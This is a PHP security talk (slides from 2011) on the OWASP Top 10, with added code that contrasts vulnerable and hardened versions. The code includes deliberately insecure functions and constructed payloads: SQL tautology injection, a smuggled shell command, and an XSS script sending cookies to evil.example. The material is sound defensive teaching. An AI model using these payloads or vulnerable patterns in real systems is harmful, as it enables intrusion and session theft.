PHP Security
E-mail: chris@ctankersley.com
Twitter: @dragonmantank
Identi.ca: dragonmantank
NWO-PUG, September 20, 2011
Who are you and why are you in my house?
Chris Tankersley
- Doing PHP for 8 years
- Lots of projects no one uses, and a few that some do
- TL;DR: https://github.com/dragonmantank

The Parts of Security
It's more than just a username/password.

What is Secure Programming?
- Minimizing Attack Surface
- Establishing Secure Defaults
- Principle of Least Privilege
- Defense in Depth
- Fail Securely
- Don't Trust Services or Users
- Separation of Duties
- Avoid Security through Obscurity
- Keep Security Simple
- Fix Security Issues Correctly
https://www.owasp.org/index.php/Secure_Coding_Principles

Most Common Attacks
And how to avoid them

OWASP Top 10 (2010 edition)
1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session Management
4. Insecure Direct Object References
5. Cross-Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Injection

What is Injection?
When input from a user or another service changes the structure of a command (a SQL query, a shell command, page markup) because it was passed through without proper validation or escaping.

Many Shapes and Sizes
- SQL Injection
- Command Injection
- HTML Injection

Protecting against Injection Attacks
- Filter user input: validate it against what the field is allowed to contain
- Escape anything not hard-coded, using the escaping rules of the context it goes into (SQL, shell, HTML)
- Ignore $_REQUEST: it merges $_GET, $_POST and $_COOKIE, so a value you expected from a form can be supplied in the URL or in a cookie instead; read the source you actually mean
SQL Injection

A Bit More Real Life

Protecting against SQL Injection
Use PDO with prepared statements: the query text is fixed and the values are bound as parameters, so user data can never change the shape of the query.
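The vulnerable pattern beside the PDO fix, as an added example that is not part of the talk. It uses an in-memory SQLite database so it runs offline; the table, column names and the two user rows are constructed for the demonstration.

```php
<?php
// Added example: string-built query versus a PDO prepared statement.
// SQLite in-memory keeps it self-contained; the schema is made up.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// On MySQL also set PDO::ATTR_EMULATE_PREPARES to false so the server, not the
// client library, does the parameter binding.

$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$pdo->exec("INSERT INTO users (username, password_hash) VALUES ('alice', 'x'), ('bob', 'y')");

// VULNERABLE: the username is pasted into the SQL text, so a quote inside it
// ends the string literal and the rest is parsed as SQL.
function findUserVulnerable(PDO $pdo, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '$username'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: the query text never changes; the value travels as a bound parameter
// and is compared as data, quotes and all.
function findUserSafe(PDO $pdo, string $username): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the string literal and adds a tautology.
$payload = "' OR '1'='1";

echo 'vulnerable rows: ', count(findUserVulnerable($pdo, $payload)), "\n";
echo 'safe rows:       ', count(findUserSafe($pdo, $payload)), "\n";
```

With the tautology payload the string-built query matches every user, while the prepared statement looks for a user literally named `' OR '1'='1` and returns nothing. Binding only protects values; table and column names or ORDER BY directions that come from the user still need a whitelist.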
Command Injection
When your script calls an external program and user input ends up on the command line, users can run their own commands on the server as the web server user.

Protecting against Command Injection
- Do not let users specify the command at all; choose it from a hard-coded list
- If the user supplies arguments, wrap each one in escapeshellarg()
- escapeshellcmd() only neutralises shell metacharacters in a whole command string; it leaves spaces alone, so a user can still append extra arguments and options to the program. Use it only as a last resort, never instead of escapeshellarg() and an allowlist
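An image-resize call that shells out, shown vulnerable and then hardened, as an added example that is not part of the talk. The `convert` binary, its install path, the option names and the validation rules are assumptions; the functions build the command line and return it rather than executing it, so the demonstration is harmless to run.

```php
<?php
// Added example: building a command line from user input.
// "convert" and its path are assumed; nothing here is executed.

// VULNERABLE: the filename is concatenated into the shell command, so
// "photo.jpg; id" or "$(id)" runs as the web server user.
function buildResizeVulnerable(string $file, string $size): string
{
    return "convert $file -resize $size out.png";
}

// FIXED: the program comes from a hard-coded allowlist (the user never names a
// command), each user value is validated for shape, then wrapped in
// escapeshellarg(), and the output path is fixed.
function buildResizeSafe(string $tool, string $file, string $size): string
{
    $allowedTools = ['convert' => '/usr/bin/convert'];   // assumed install path
    if (!isset($allowedTools[$tool])) {
        throw new InvalidArgumentException('unknown tool');
    }
    // A size is digits x digits, nothing else.
    if (!preg_match('/^\d{1,4}x\d{1,4}$/', $size)) {
        throw new InvalidArgumentException('bad size');
    }
    // Filename: safe character set only, and it may not start with "." or "-".
    // escapeshellarg() stops shell interpretation, but a value starting with
    // "-" would still be parsed by the program as an option (argument injection).
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]*$/', $file)) {
        throw new InvalidArgumentException('bad filename');
    }
    // escapeshellarg() single-quotes the value and escapes embedded quotes, so
    // the shell sees exactly one argument whatever it contains.
    return $allowedTools[$tool] . ' ' . escapeshellarg($file)
        . ' -resize ' . escapeshellarg($size)
        . ' ' . escapeshellarg('out.png');
}

// Constructed attacker input.
$evil = 'photo.jpg; id';

echo buildResizeVulnerable($evil, '100x100'), "\n";   // a second command is smuggled in
try {
    echo buildResizeSafe('convert', $evil, '100x100'), "\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo buildResizeSafe('convert', 'summer-2011.jpg', '100x100'), "\n";
```

When you do execute the command, prefer proc_open() with an array argument (PHP 7.4 and later), which starts the program directly without a shell, so there are no shell metacharacters to escape at all; the shape validation and the leading-dash rule still apply because the program itself parses the arguments.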
HTML/Script Injection
- HTML Injection: when user input is used to create new markup that the application did not expect
- Script Injection: when user input is used to add new scripting to a page

HTML/Script Injection

Protecting against HTML/Script Injection
- Decide if you really need to take HTML input
- If you do: run it through an HTML cleaner like Tidy or htmLawed and create a whitelist of allowed tags and attributes; everything else is stripped
- If you don't: escape it on output with htmlspecialchars() (with ENT_QUOTES and the page's character set) or htmlentities()
Cross Site Scripting
Or XSS

What is it?
When an attacker gets script into a page that other users view. The script runs in the victim's browser with your site's origin, so it can read the page, the session cookie and form contents, and send them to another site.

How to avoid XSS?
Since this is an injection attack, use the same steps as for HTML/script injection: escape every untrusted value for the context it is output in (HTML body, attribute, JavaScript, URL), and do not rely on filtering input alone.
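Context-aware output escaping for the HTML/script injection and XSS slides above, as an added example that is not part of the talk. The helper names (`e`, `eJs`, `eUrl`, `safeHref`) and the comment, name and link values are constructed; the page fragment is assumed to be served as UTF-8.

```php
<?php
// Added example: one escaping helper per output context.
// Helper names and sample values are constructed.

// HTML body text or a quoted attribute value. ENT_QUOTES escapes both quote
// kinds; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Data handed to inline JavaScript: emit a JSON literal with <, >, &, ' and "
// hex-escaped so it cannot terminate the <script> block it sits in.
function eJs($value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// A value placed inside a URL query string.
function eUrl(string $s): string
{
    return rawurlencode($s);
}

// A user-controlled href: allow http(s) and site-relative paths, refuse
// javascript:/data: schemes and protocol-relative "//host" forms.
function safeHref(string $url): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme === null || $scheme === false) {
        $second = $url[1] ?? '';
        $relative = isset($url[0]) && $url[0] === '/' && $second !== '/' && $second !== '\\';
        return $relative ? e($url) : '#';
    }
    return in_array(strtolower($scheme), ['http', 'https'], true) ? e($url) : '#';
}

// Constructed attacker-supplied values.
$comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
$name    = '" onmouseover="alert(1)';
$site    = 'javascript:alert(document.cookie)';

// VULNERABLE: raw interpolation hands the markup straight to the browser.
$vulnerable = "<p>$comment</p><input value=\"$name\"><a href=\"$site\">site</a>";

// FIXED: every untrusted value is escaped for the context it lands in.
$safe = '<p>' . e($comment) . '</p>'
      . '<input value="' . e($name) . '">'
      . '<a href="' . safeHref($site) . '">site</a>'
      . '<a href="/search?q=' . eUrl($name) . '">search</a>'
      . '<script>var user = ' . eJs(['name' => $name]) . ';</script>';

echo "vulnerable:\n", $vulnerable, "\n\nsafe:\n", $safe, "\n";
```

The attribute payload shows why ENT_QUOTES matters: without it the double quote survives and `onmouseover` becomes a live attribute. Escaping is applied at output time, not on input, so the same stored comment can be rendered safely in HTML, in a JSON API and in a URL.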
Broken Authentication and Session Management

What is it?
- Insecure storing of credentials
- Session IDs exposed via URL
- Session fixation attacks

Storing Credentials
- Never store passwords in the clear; store a salted hash
- Do not use md5 or sha1: both are broken and not recommended for secure hashing
- A salted sha256 via hash() beats md5, but any single pass of a fast hash is cheap to brute-force on a GPU; use a slow, salted password hash such as bcrypt (crypt() with CRYPT_BLOWFISH, or password_hash() from PHP 5.5)
- If you have to keep the raw data (non-password secrets), encrypt it with AES-256 in an authenticated mode. Careful with mcrypt: MCRYPT_RIJNDAEL_256 is Rijndael with a 256-bit block, which is not AES; AES-256 is MCRYPT_RIJNDAEL_128 with a 32-byte key. mcrypt is deprecated in PHP 7.1 and removed from core in 7.2, so prefer openssl_encrypt()
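Password storage with bcrypt, plus a transparent upgrade of legacy unsalted md5 rows on the user's next successful login, as an added example that is not part of the talk. It relies on password_hash()/password_verify()/password_needs_rehash() (PHP 5.5+) and hash_equals() (PHP 5.6+); the user table and the two passwords are constructed.

```php
<?php
// Added example: bcrypt password storage and md5-to-bcrypt migration.
// The $users array stands in for a database table.

// Hash a new password. bcrypt generates and embeds its own salt; "cost" sets
// how slow the hash is and should be raised as hardware gets faster.
// Note: bcrypt only looks at the first 72 bytes of the password.
function hashPassword(string $password): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
}

// Verify a login. $stored may be a legacy md5 hex digest from before the
// migration; on success $rehash receives the new bcrypt hash to write back,
// or null if the stored hash is already current.
function checkLogin(string $password, string $stored, ?string &$rehash = null): bool
{
    $rehash = null;

    // Legacy row: 32 hex characters = unsalted md5.
    if (strlen($stored) === 32 && ctype_xdigit($stored)) {
        // Constant-time comparison so response timing does not reveal how many
        // leading bytes of the digest matched.
        if (!hash_equals($stored, md5($password))) {
            return false;
        }
        $rehash = hashPassword($password);   // we have the plaintext now: upgrade
        return true;
    }

    if (!password_verify($password, $stored)) {
        return false;
    }
    // Cost or algorithm changed since this hash was made? Re-hash while we
    // still hold the plaintext.
    if (password_needs_rehash($stored, PASSWORD_BCRYPT, ['cost' => 12])) {
        $rehash = hashPassword($password);
    }
    return true;
}

// Constructed users: one already migrated, one still on md5.
$users = [
    'alice' => hashPassword('correct horse battery staple'),
    'bob'   => md5('hunter2'),
];

$attempts = [
    ['alice', 'correct horse battery staple'],
    ['bob',   'hunter2'],
    ['bob',   'wrong'],
];
foreach ($attempts as [$u, $p]) {
    $ok = checkLogin($p, $users[$u], $newHash);
    if ($ok && $newHash !== null) {
        $users[$u] = $newHash;   // persist the bcrypt hash to the database
    }
    printf("%-6s %s%s\n", $u, $ok ? 'ok' : 'denied', $newHash ? ' (hash upgraded)' : '');
}
```

The migration path only converts accounts that log in; rows that stay on md5 remain as weak as before, so dormant accounts should get a forced reset after a cut-off date. password_verify() and hash_equals() both compare in constant time, so the login handler does not need its own `===` on the hash.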
Session IDs in URL
- Commonly used when cookies can't be enabled
- Make sure the following is set in your php.ini:
  session.use_trans_sid = 0
  session.use_only_cookies = 1
- Also set session.cookie_httponly = 1 so script on the page cannot read the cookie

Session Fixation
- An attacker fixes the victim's session ID in advance (for example by sending a link that carries PHPSESSID) and waits for the victim to log in with it; the attacker then shares the authenticated session
- What happens if your users don't log out? The fixed session stays valid, so expire idle sessions
- Call session_regenerate_id(true) on login and on any privilege change, and use the session itself (server-side) to track login status, never a client-controlled cookie or parameter
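Session setup that closes the three session holes listed on these slides, as an added example that is not part of the talk. It applies the php.ini settings above through ini_set() for hosts where php.ini cannot be edited, adds session.use_strict_mode (PHP 5.5.2+), regenerates the ID on login and enforces an idle timeout. The function names, the user ID and the 30-minute limit are assumptions.

```php
<?php
// Added example: session hardening against URL leakage, fixation and
// never-logged-out users. Function names are constructed.

function startSecureSession(): void
{
    // Never accept or emit session IDs in URLs.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // Refuse session IDs the client invented: a planted, unknown ID gets a
    // fresh one instead of being adopted by the server.
    ini_set('session.use_strict_mode', '1');
    // Cookie unreadable from JavaScript and only sent over HTTPS.
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');
    session_start();
}

// On successful authentication, swap the session ID so any ID an attacker
// fixed before login no longer refers to the logged-in session.
function loginUser(int $userId): void
{
    session_regenerate_id(true);            // true: discard the old session data
    $_SESSION['user_id']   = $userId;
    $_SESSION['last_seen'] = time();
}

// Login status lives server-side in $_SESSION, never in a client-editable value.
function currentUser(int $idleLimit = 1800): ?int
{
    if (!isset($_SESSION['user_id'], $_SESSION['last_seen'])) {
        return null;                        // nothing set: anonymous
    }
    // Idle timeout covers users who never log out.
    if (time() - $_SESSION['last_seen'] > $idleLimit) {
        logoutUser();
        return null;
    }
    $_SESSION['last_seen'] = time();
    return $_SESSION['user_id'];
}

function logoutUser(): void
{
    $_SESSION = [];
    // Expire the cookie on the client as well as destroying server-side data.
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000,
                  $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

// Constructed flow: anonymous visitor, login as user 42, request, logout.
// All session calls happen before any output so headers can still be sent.
startSecureSession();
$before = currentUser();
loginUser(42);
$after = currentUser();
logoutUser();
$afterLogout = currentUser();
var_dump($before, $after, $afterLogout);
```

Regenerating on login is the core fixation defence; use_strict_mode is defence in depth that also blocks the attacker from pre-creating a session with an ID of their choosing. On PHP 7.3 and later, session.cookie_samesite can be set to Lax as well.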
Insecure Direct Object References

What is it?
- The app exposes an internal reference (a database ID, a filename) and does not check that the requesting user may access the object it points to
- Should be handled by checking authorization every time the object is accessed, or by mapping internal IDs to per-user indirect references
- This is not an injection attack, but a logic attack

An Example

How to Avoid
- Always check that the user has authorization to access the resource
- Map variables / whitelist values so the real identifiers are never exposed and guessing other objects' references is harder
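An invoice lookup shown three ways, as an added example that is not part of the talk: the unchecked version, the query scoped to the current user, and an indirect reference map so the client never sees database IDs. The invoices table, the two rows and the user IDs are constructed; it runs against in-memory SQLite.

```php
<?php
// Added example: direct object reference with and without an ownership check,
// plus per-user indirect references. Schema and rows are constructed.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner_id INTEGER, amount INTEGER)');
$pdo->exec('INSERT INTO invoices VALUES (1, 100, 250), (2, 200, 999)');

// VULNERABLE: trusts ?id= completely. User 100 reads invoice 2 by changing the number.
function invoiceVulnerable(PDO $pdo, int $id): ?array
{
    $s = $pdo->prepare('SELECT id, owner_id, amount FROM invoices WHERE id = :id');
    $s->execute([':id' => $id]);
    return $s->fetch(PDO::FETCH_ASSOC) ?: null;
}

// FIXED (authorization on access): ownership is part of the query, so a row
// belonging to someone else simply does not exist for this caller.
function invoiceForUser(PDO $pdo, int $id, int $currentUserId): ?array
{
    $s = $pdo->prepare(
        'SELECT id, owner_id, amount FROM invoices WHERE id = :id AND owner_id = :uid'
    );
    $s->execute([':id' => $id, ':uid' => $currentUserId]);
    return $s->fetch(PDO::FETCH_ASSOC) ?: null;
}

// FIXED (indirect reference map): the client only ever sees random tokens that
// map back to IDs this user may use. Store the map in the session.
function buildReferenceMap(PDO $pdo, int $currentUserId): array
{
    $s = $pdo->prepare('SELECT id FROM invoices WHERE owner_id = :uid');
    $s->execute([':uid' => $currentUserId]);
    $map = [];
    foreach ($s->fetchAll(PDO::FETCH_COLUMN) as $id) {
        $map[bin2hex(random_bytes(8))] = (int) $id;   // random_bytes: PHP 7.0+
    }
    return $map;
}

function invoiceByReference(PDO $pdo, array $map, string $ref, int $currentUserId): ?array
{
    if (!isset($map[$ref])) {
        return null;    // unknown token: not one of this user's objects
    }
    // Still scope the query to the user: the map is defence in depth,
    // not a replacement for the authorization check.
    return invoiceForUser($pdo, $map[$ref], $currentUserId);
}

$me = 100;   // constructed: the logged-in user
echo 'unchecked lookup of invoice 2: ', invoiceVulnerable($pdo, 2) ? 'returned' : 'refused', "\n";
echo 'scoped lookup of invoice 2:    ', invoiceForUser($pdo, 2, $me) ? 'returned' : 'refused', "\n";
$map = buildReferenceMap($pdo, $me);
echo 'guessed token:                 ', invoiceByReference($pdo, $map, 'deadbeef', $me) ? 'returned' : 'refused', "\n";
foreach ($map as $token => $id) {
    echo "own token $token -> invoice ", invoiceByReference($pdo, $map, $token, $me)['id'], "\n";
}
```

Putting the owner condition into the query rather than fetching first and comparing afterwards means there is no code path where the object is loaded before the check, which is where "forgot to check" bugs usually hide.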
Cross Site Request Forgery
Or CSRF Attacks

What is it?
- A page the attacker controls makes the victim's browser send a request to a site the victim is logged in to; the browser attaches the session cookie, so the site treats the forged request as a legitimate command from the victim
- In days gone by this was countered with Referer checking, but don't trust Referer information: it is optional, stripped by many proxies and browsers, and controlled by the client

An Example: Bank Transfer
- A bank transfer is done via $_GET variables
- User is authenticated but not logged out, so an <img> tag or link on any other site can trigger the transfer

How to avoid this
- Include a hidden element in the form with a secret, per-session (or one-time) value, and reject any state-changing request whose value does not match what the server stored
- Make state-changing actions POST only, so a plain link or image request cannot trigger them
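A per-session CSRF token for the bank transfer form, as an added example that is not part of the talk. It uses random_bytes() (PHP 7.0+) and hash_equals() (PHP 5.6+); the route, field names and the three simulated requests are constructed.

```php
<?php
// Added example: CSRF token issue and check for a transfer form.
// Route and field names are assumptions; requests are simulated.

session_start();

// One secret token per session, created on first use and kept server-side.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare in constant time so timing cannot be used to guess the token
// byte by byte.
function csrfValid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function transferForm(): string
{
    $t = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/transfer">'
         . '<input type="hidden" name="csrf_token" value="' . $t . '">'
         . '<input name="to"><input name="amount"><button>Send</button></form>';
}

// The handler: state changes only via POST, and only with a valid token.
function handleTransfer(string $method, array $post): string
{
    if ($method !== 'POST') {
        return '405: transfers must be POSTed';
    }
    if (!csrfValid($post['csrf_token'] ?? null)) {
        return '403: bad or missing CSRF token';
    }
    // Authorization and the actual transfer would go here.
    return 'accepted: ' . (int) $post['amount'] . ' to account ' . (int) $post['to'];
}

// Constructed requests. The first two are what a forged <img> or a forged
// cross-site form can produce; the third came from our own form.
echo handleTransfer('GET',  ['to' => 1, 'amount' => 500]), "\n";
echo handleTransfer('POST', ['to' => 1, 'amount' => 500]), "\n";
echo handleTransfer('POST', ['to' => 1, 'amount' => 500, 'csrf_token' => csrfToken()]), "\n";
echo transferForm(), "\n";
```

The attacker's page cannot read the token because the browser's same-origin policy stops it from reading our form, so the forged request arrives without it. On PHP 7.3 and later, setting session.cookie_samesite to Lax adds a second, independent layer.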
Security Misconfiguration

Beyond the scope of programming
- Check for server hardening guidelines for your OS
- Password rotation practices
- Understanding your settings (for example display_errors off in production)
- Keep your stack up to date!

Insecure Cryptographic Storage

More of a logic problem
- Encrypting data in the database, but leaving it unencrypted during output (logs, exports, caches, error messages)
- Using unsalted hashes

How to avoid this
- Like when storing credentials, use a salt whenever hashing information
- Only decrypt data when it is needed, in the one code path that needs it, and use an authenticated cipher mode so tampering with the stored ciphertext is detected
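Field encryption with AES-256-GCM through openssl_encrypt() (AEAD support needs PHP 7.1+), as an added example that is not part of the talk; it also replaces the mcrypt/"Rijndael 256" advice from the credentials slide. The card number is a constructed test value, the key is generated on the spot (in production it would come from a secrets store, never the same database), and the record layout and function names are assumptions.

```php
<?php
// Added example: authenticated encryption of one sensitive field, with the
// plaintext decrypted only on the code path that needs it.

const CIPHER = 'aes-256-gcm';
const TAG_LEN = 16;

function encryptField(string $plaintext, string $key): string
{
    if (strlen($key) !== 32) {
        throw new InvalidArgumentException('AES-256 needs a 32-byte key');
    }
    // Fresh random nonce per record; nonce reuse under one key breaks GCM.
    $iv  = random_bytes(openssl_cipher_iv_length(CIPHER));
    $tag = '';
    $ct  = openssl_encrypt($plaintext, CIPHER, $key, OPENSSL_RAW_DATA, $iv, $tag, '', TAG_LEN);
    if ($ct === false) {
        throw new RuntimeException('encryption failed');
    }
    // Store nonce + tag + ciphertext together; base64 keeps it column-safe.
    return base64_encode($iv . $tag . $ct);
}

function decryptField(string $stored, string $key): string
{
    $raw   = base64_decode($stored, true);
    $ivLen = openssl_cipher_iv_length(CIPHER);
    if ($raw === false || strlen($raw) < $ivLen + TAG_LEN) {
        throw new RuntimeException('malformed ciphertext');
    }
    $iv  = substr($raw, 0, $ivLen);
    $tag = substr($raw, $ivLen, TAG_LEN);
    $ct  = substr($raw, $ivLen + TAG_LEN);
    // The tag check makes any modification of the stored value fail here
    // instead of yielding silently corrupted plaintext.
    $pt = openssl_decrypt($ct, CIPHER, $key, OPENSSL_RAW_DATA, $iv, $tag);
    if ($pt === false) {
        throw new RuntimeException('ciphertext rejected (wrong key or tampered)');
    }
    return $pt;
}

// Display never needs the plaintext: keep the last four digits in the clear
// at write time and decrypt only where the full number is actually used.
function maskCardNumber(string $last4): string
{
    return '**** **** **** ' . $last4;
}

$key = random_bytes(32);                 // constructed: would come from a KMS
$pan = '4111111111111111';               // constructed test card number
$record = ['last4' => substr($pan, -4), 'pan_enc' => encryptField($pan, $key)];

echo 'display path: ', maskCardNumber($record['last4']), "\n";        // no decryption
echo 'charge path:  ', decryptField($record['pan_enc'], $key), "\n";  // the only decrypt

// Flip one bit of the stored ciphertext: GCM's tag check rejects it.
$raw = base64_decode($record['pan_enc']);
$raw[strlen($raw) - 1] = chr(ord($raw[strlen($raw) - 1]) ^ 0x01);
try {
    decryptField(base64_encode($raw), $key);
} catch (RuntimeException $e) {
    echo 'tampered:     ', $e->getMessage(), "\n";
}
```

Keeping the decrypt in one function that only the charging code calls makes the "unencrypted during output" mistake visible in review: any other caller of decryptField() is a finding. Pre-computing the masked form avoids the temptation to decrypt just to show four digits.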
Failure to Restrict URL Access

What is it?
- When users can gain access to parts of the application just through URL manipulation
- When the app doesn't check authorization properly

Security through Obscurity
- Don't trust that just because a user doesn't know a URL, they can't get to it
- Fuzzers and directory brute-forcers find all kinds of things, especially if the app is common and its paths are published

How to avoid this
ALWAYS check authorization. The extra CPU cycles are worth it.
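A front controller that decides access from a route table before any page code runs, as an added example that is not part of the talk. Unlike the per-object check in the IDOR example, this is a per-URL, per-role gate, and a URL with no table entry fails closed. The routes, role names and user records are assumptions; the web server is assumed to send every request through this script.

```php
<?php
// Added example: route-level authorization that fails closed.
// Routes, roles and users are constructed.

// Every reachable route is listed with the roles allowed to use it. A URL
// that is not listed is denied, so a forgotten entry cannot open a hole.
const ROUTES = [
    '/'            => ['roles' => ['anonymous', 'user', 'admin']],
    '/account'     => ['roles' => ['user', 'admin']],
    '/admin'       => ['roles' => ['admin']],
    '/admin/users' => ['roles' => ['admin']],
];

// Returns the HTTP status the request should get.
function authorize(string $path, ?array $user): int
{
    // Normalise so "/Admin/" or "/admin/../admin" cannot dodge the table.
    $path = '/' . trim(strtolower($path), '/');
    if (strpos($path, '..') !== false) {
        return 400;
    }
    if (!isset(ROUTES[$path])) {
        return 404;   // unknown URL: the response says nothing about what exists
    }
    $role = $user['role'] ?? 'anonymous';
    if (!in_array($role, ROUTES[$path]['roles'], true)) {
        // Anonymous callers are asked to log in; logged-in ones are refused.
        return $user === null ? 401 : 403;
    }
    return 200;
}

// Constructed users and a few URLs a brute-forcer would try.
$alice = ['id' => 1, 'role' => 'user'];
$root  = ['id' => 2, 'role' => 'admin'];

printf("%-22s %5s %5s %5s\n", 'path', 'anon', 'user', 'admin');
foreach (['/', '/account', '/ADMIN/', '/admin/users', '/admin/backup.sql', '/admin/../account'] as $p) {
    printf("%-22s %5d %5d %5d\n", $p, authorize($p, null), authorize($p, $alice), authorize($p, $root));
}
```

The check runs once, centrally, and before dispatch, so adding a page cannot accidentally skip it; the cost is one array lookup per request, which is the "extra CPU cycles" the slide is talking about. Static files the web server serves directly bypass this script, so keep sensitive files out of the document root rather than relying on an unguessable name.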
Insufficient Transport Layer Protection

Not using SSL when you should
- If your data is sensitive, use SSL/TLS
- Are your logins behind SSL? There isn't really an excuse. You can get an SSL cert for $9/year.
- Mark the session cookie Secure so it is never sent over plain HTTP

Unvalidated Redirects and Forwards

What is it?
- When an app takes the redirect or forward destination from the request (for example ?next=) without validating that it is a destination the app intended, so an attacker can send victims from your trusted domain to a site of their choosing
- Validate the target against a whitelist of hosts, or only accept relative paths on your own site
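Validation of a ?next= parameter before it goes into a Location header, as an added example that is not part of the talk. The host names in the allowlist and the candidate URLs are constructed; the function returns the fallback for anything it cannot prove safe, including the protocol-relative and userinfo tricks that a naive "starts with /" or "contains our domain" check lets through.

```php
<?php
// Added example: allowlist validation of a redirect target.
// Host names and candidate URLs are constructed.

const ALLOWED_HOSTS = ['www.example.com', 'help.example.com'];

// Returns a destination safe to use in a Location header, or $fallback.
function safeRedirectTarget(?string $next, string $fallback = '/'): string
{
    if ($next === null || $next === '') {
        return $fallback;
    }

    // Site-relative path: exactly one leading "/" ("//host" and "/\host" are
    // treated as absolute URLs by browsers) and no control characters that
    // could split the header.
    $second = $next[1] ?? '';
    if ($next[0] === '/' && $second !== '/' && $second !== '\\'
        && !preg_match('/[\x00-\x1f\x7f]/', $next)) {
        return $next;
    }

    // Absolute URL: https only, host on the allowlist, no userinfo
    // ("https://www.example.com@evil.example/" has host evil.example).
    $parts = parse_url($next);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback;
    }
    if (strtolower($parts['scheme']) !== 'https'
        || !in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)
        || isset($parts['user']) || isset($parts['pass'])) {
        return $fallback;
    }
    return $next;
}

$candidates = [
    '/account',                               // ok: relative path
    '//evil.example/phish',                   // protocol-relative: rejected
    '/\\evil.example/phish',                  // backslash variant: rejected
    'https://help.example.com/faq',           // ok: allowlisted host
    'https://www.example.com@evil.example/',  // userinfo trick: rejected
    'http://www.example.com/',                // plain http: rejected
    'javascript:alert(1)',                    // no host: rejected
    "/login\r\nSet-Cookie: a=b",              // header injection: rejected
];
foreach ($candidates as $c) {
    printf("%-42s -> %s\n", str_replace(["\r", "\n"], ['\r', '\n'], $c), safeRedirectTarget($c));
}
```

The same function serves forwards: if the app includes a file or dispatches to a route named by the request, pass the value through an allowlist exactly like this instead of trusting it. A validated relative path is the simplest outcome because it can only ever stay on your own host.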
Putting it Together

Attacking from Multiple Fronts
- Attackers will employ many different vectors in one attack
- An HTML injection becomes XSS; combined with a broken session system or a missing URL access check it lets the attacker force users to perform actions they never intended
- Script injection can lead to session hijacking

Remember...
- Minimizing Attack Surface
- Establishing Secure Defaults
- Principle of Least Privilege
- Defense in Depth
- Fail Securely
- Don't Trust Services or Users
- Separation of Duties
- Avoid Security through Obscurity
- Keep Security Simple
- Fix Security Issues Correctly
https://www.owasp.org/index.php/Secure_Coding_Principles

Questions?
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 

Dernier (20)

Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Scale your database traffic with Read & Write split using MySQL Router
